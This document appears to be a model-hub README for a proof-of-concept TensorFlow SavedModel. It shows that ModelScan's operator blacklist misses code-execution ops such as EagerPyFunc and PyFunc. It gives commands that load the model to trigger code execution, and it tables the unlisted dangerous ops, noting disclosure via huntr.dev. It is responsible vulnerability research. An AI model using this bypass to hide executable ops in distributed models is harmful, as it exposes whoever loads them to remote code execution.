ModelScan TF Ops Blacklist Bypass β PoC
What This Is
ModelScan's unsafe_tf_operators blacklist only has 2 entries: ReadFile and WriteFile.
But TensorFlow has hundreds of raw ops, including code execution ops like EagerPyFunc and PyFunc. All of them pass through ModelScan undetected.
This SavedModel contains EagerPyFunc ops β ModelScan reports 0 Issues, 0 Errors, 0 Skipped.
Verify
# 1. ModelScan says CLEAN
pip install modelscan[all]
modelscan -p saved_model.pb
# Output: Issues: 0, Errors: 0, Skipped: 0
# 2. But the graph contains EagerPyFunc
python3 -c "
import tensorflow as tf
data = open('saved_model.pb', 'rb').read()
print(f'EagerPyFunc: {data.count(b\"EagerPyFunc\")}x')
print(f'StatefulPartitionedCall: {data.count(b\"StatefulPartitionedCall\")}x')
"
# 3. Load + call β RCE
python3 -c "
import tensorflow as tf
model = tf.saved_model.load('.')
print(model(tf.constant([1.0, 2.0, 3.0])))
print('Check /tmp/PYFUNC_RCE')
"
Dangerous Ops NOT in Blacklist
| Op | Risk | In Blacklist? |
|---|---|---|
| EagerPyFunc | Code execution | β |
| PyFunc | Code execution | β |
| PyFuncStateless | Code execution | β |
| StatefulPartitionedCall | Calls sub-function | β |
| PartitionedCall | Calls sub-function | β |
| WholeFileReader | File read | β |
| WholeFileReaderV2 | File read | β |
| MatchingFiles | Directory listing | β |
Disclosure
Submitted to ProtectAI via huntr.dev.
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support